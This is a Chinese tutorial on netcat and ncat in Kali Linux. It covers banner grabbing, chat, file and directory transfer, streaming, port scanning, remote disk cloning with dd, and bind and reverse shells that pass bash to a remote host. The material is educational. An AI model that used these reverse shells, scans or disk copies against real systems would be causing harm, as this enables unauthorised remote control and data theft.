欢迎大家来到IT世界,在知识的湖畔探索吧!
NETCAT——NC
- 网络工具中的瑞士军刀——小身材,大智慧。
NC——TELNET/BANNER
获取banner信息
nc -nv 1.1.1.1 110 //pop3服务
nc -nv 1.1.1.1 25 //smtp服务
nc -nv 1.1.1.1 80 //http服务
关于获取banner信息还有许多其他的工具可以利用,比如nmap还有dmitry都是kali自带的工具,都可以进行banner信息的获取。不一一举例。
通过nc -h查看功能
NC——传输文本信息
这个功能可以用来连接两台主机。进行聊天对话沟通。
A: nc -l -p 4444
B: nc -nv 1.1.1.1 4444
第一台主机代表服务端需要先侦听一个端口,使用第一条命令,-l代表listen,也就是听的意思,-p指的是端口,意思就是告诉nc我想要侦听4444端口。
第二台主机代表客户端,使用nc连接服务端的这个端口,就可以进行聊天。前提条件是,客户端必须知道服务端开启的端口和IP地址。
连接状态一方终止两边都会终止。
NC——传输文件/目录
传输文件
A: nc -lp 333 > 1.mp4 #接收端
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1 #发送端
接收端表示侦听一个333端口,并将接受的文件输出到1.MP4文件。
发送端表示nc连接输入文件进行发送。-q 1表示如果传送结束1秒后自动退出服务。(文件比较大的话可以使用这个比较方便)
简单来说就是A开启服务后,等待着B来给他发送文件。
或者使用这样的方式传输文件
A: nc -q 1 -lp 333 < a.mp4
B: nc -nv 1.1.1.1 333 > 2.mp4
A作为发送端,先将服务开启,然后B进行连接,一旦连接成功,就会进行传输,完成后一秒关闭连接。
这个是A开启服务后,准备一个文件,然后等待B来连接它并接收这个文件。
以上是两种传输方式,可以A传输给B也可以B传输给A。
传输目录
目录的传输也可以双向传输,与上述文件传输类似。下面只写一个方向。
可以使用以下命令
A: tar -cvf -music/ | nc -lp 333 -q 1
B: nc -nv 1.1.1.1 333 | tar -xvf –
cvf是将文件打包的作用,然后将打包后的文件灌输到管道中,使用nc进行传输。等待B连接。
B连接后接收到来自A端的文件,使用xvf解压tar包。还原成目录。
加密传输文件
使用命令
A: mcrypt –flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
B: nc -lp 333 | mcrypt –flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
这个是不用记的,毕竟这么长。
输入完整命令后,在A端也就是发送端会提示让输入密码(自己设置),设置密码后,再次进行输入(密码不显示,直接输入就行)。
在B端进行连接就会提示输入密码。这个密码就是A端设置的密码。输入正确就就可以接收。
注:这个加密并不是nc自带的加密方式。而是利用了另一个程序的功能。这个程序名叫mcrypt,这个kali里面没有自带,需要自行安装。
安装方法直接用apt-get包管理器就行。
apt-get install mcrypt -y
NC——流媒体服务器
使用命令
A: cat 1.mp4 | nc -lp 333 # 服务端
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000- # 客户端
cat是查看文本信息的,这里也可以用来查看1.MP4的信息
mplayer是一个媒体播放应用。
cache 3000 表示缓存大小。
NC——端口扫描
端口扫描有好多工具可以使用。比如:nmap、Dmitry、netcat(也就是nc),这些都是kali当中自带的工具。
这里主要介绍学习nc
其他的后续可能会写。
nc -nvz IP地址 端口范围
如:nc -nvz 192.168.40.138 1-5000
NC——远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda #接收方
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1 #这里B相当于被取证的电脑
- 远程电子取证,可以将目标服务器硬盘远程复制或者内存。
- if相当于inputfile(输入)
- of相当于outputfile(输出)
NC——远程控制
#正向
A: nc -lp 333 -c bash #服务器端
B: nc 1.1.1.1 333 #客户端
#反向
A: nc -lp 333 #客户端
B: nc 1.1.1.1 333 -c bash #服务器端
这里利用shell使得用nc连接的用户可以进行远程控制
bash是linux系统自带的shell。
注:windows用户把bash改成cmd
NC——NCAT
- Nc缺乏加密和身份验证的能力。
- Ncat包含于nmap工具包中
- 使用方法
- 依旧是A和B两台机器实验
A: ncat -c bash -allow 192.168.20.14 -vnl 333 -ssl
B: ncat -nv 1.1.1.1 333 -ssl
参数说明:
A:首先ncat需要给出一个bash(本地shell),然后-allow允许,后面加一个IP地址,是服务器端只允许指定的IP访问或连接。并且侦听一个端口333
B:直接连接就行
连接成功后服务器端会显示Ncat:Connection from [ip] [port]
其实过程中两台主机已经进行了SSL证书验证和指纹识别。
这个时候使用无论输入什么命令或者传输什么信息,都是经过加密的。这里两台主机传输信息的管道就是加密的。
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://itzsg.com/35422.html